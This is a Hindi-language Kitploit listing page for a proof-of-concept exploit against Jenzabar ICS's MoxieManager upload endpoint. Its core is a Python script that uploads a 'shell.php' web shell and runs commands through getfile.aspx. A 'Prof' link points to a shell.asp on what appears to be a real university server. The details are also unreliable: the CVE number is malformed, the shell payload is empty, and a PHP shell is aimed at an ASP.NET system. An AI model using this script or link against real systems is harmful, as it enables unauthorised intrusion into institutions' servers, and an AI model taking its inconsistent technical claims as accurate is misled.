Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
ICS-MoxieManager-FileUpload-PoC — CVE-2026-30-03 9.8 (गंभीर) Jenzabar ICS + MoxieManager में संभावित RCE | Kitploit
उपकरण/GitHubGitHub/itsismarcos/ics-moxiemanager-fileupload-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट
GitHubitsismarcos/ics-moxiemanager-fileupload-poc

ICS-MoxieManager-FileUpload-PoC

CVE-2026-30-03 9.8 (गंभीर) Jenzabar ICS + MoxieManager में संभावित RCE

रिपॉजिटरी देखें
14 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

ICS-MoxieManager-RCE-CVE-2026-30-03

CVE-2026-30-03 9.8 (गंभीर) संभावित RCE Jenzabar ICS + MoxieManager

proff https://www.youtube.com/watch?v=lcfUL6Xx3f4&feature=youtu.be

CVE CVSS प्रभाव प्रभावित CVE-2026-30-03 9.8 (गंभीर) संभावित RCE Jenzabar ICS + MoxieManager

Jenzabar ICS प्रणाली द्वारा उपयोग किए जाने वाले MoxieManager घटक में एक भेद्यता फ़ाइलों के अनुचित अपलोड की अनुमति दे सकती है, जो कुछ शर्तों के तहत सार्वजनिक रूप से एक्सेस की जा सकती हैं और संभावित रूप से रिमोट कोड निष्पादन (RCE) की ओर ले जा सकती हैं। तकनीकी विवरण

समस्या निम्न कारणों से उत्पन्न होती है:

अपलोड की गई फ़ाइलों का उचित सत्यापन न होना

सार्वजनिक एंडपॉइंट के माध्यम से फ़ाइलों का संभावित एक्सपोज़र:

/ICS/staticpages/getfile.aspx

एंडपॉइंट पर असंगत प्रमाणीकरण नियंत्रण:

/ICS/UI/Common/Scripts/tinymce/plugins/moxiemanager/api.ashx

विशिष्ट परिदृश्यों में, अपलोड की गई फ़ाइलें सुलभ निर्देशिकाओं में संग्रहीत की जा सकती हैं और बाद में पुनर्प्राप्त की जा सकती हैं।

प्रभाव फ़ाइलों का मनमाना अपलोड संवेदनशील सामग्री का एक्सपोज़र संभावित रिमोट कोड निष्पादन (सर्वर कॉन्फ़िगरेशन पर निर्भर) सिस्टम का पूर्ण समझौता

वर्गीकरण CVSS v3.1: 9.8 (गंभीर) वेक्टर: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE-434: बिना प्रतिबंध के फ़ाइल अपलोड CWE-284: अनुचित एक्सेस नियंत्रण

PoC एक्सप्लॉइट

#!/usr/bin/env python3

CVE-2026-30-03 PoC - ICS MoxieManager RCE

import requests

TARGET = "https://example.edu" MOXIE = f"{TARGET}/ICS/UI/Common/Scripts/tinymce/plugins/moxiemanager/api.ashx" UUID = "5d6b24cb-7bfe-4a6b-8581-4426bf0f4101"

1. Upload PHP Shell

files = {'file': ('shell.php', '', 'application/x-php')} data = {'action': 'upload', 'path': '/1085255', 'csrf': 'E24607903E4DC7496732F267BAD48FF35D855DA9E362AB80E0340D5B5EC5F164'}

r = requests.post(MOXIE, files=files, data=data) print(f"[+] Upload: {r.status_code}")

2. Execute

SHELL = f"{TARGET}/ICS/staticpages/getfile.aspx?target=/moxiemanager/files/users/{UUID}/shell.php" print(f"[+] Shell: {SHELL}?cmd=whoami") print(requests.get(f"{SHELL}?cmd=whoami").text)

प्रभावित सिस्टम (33+ पुष्टि)

उपचार तत्काल (शमन):

  1. DELETE /moxiemanager/files/users/*/shell.php

  2. getfile.aspx को प्रतिबंधित करें:

  3. RewriteRule ^/ICS/staticpages/getfile.aspx?target=.*shell.php - [F,L]

  4. MoxieManager अपलोड अक्षम करें

Prof https://my.rsu.edu/ICS/icsfs/shell.asp?target=61d75719-3a6a-4908-bb5d-3f9a443dd443

टूल डाउनलोड करें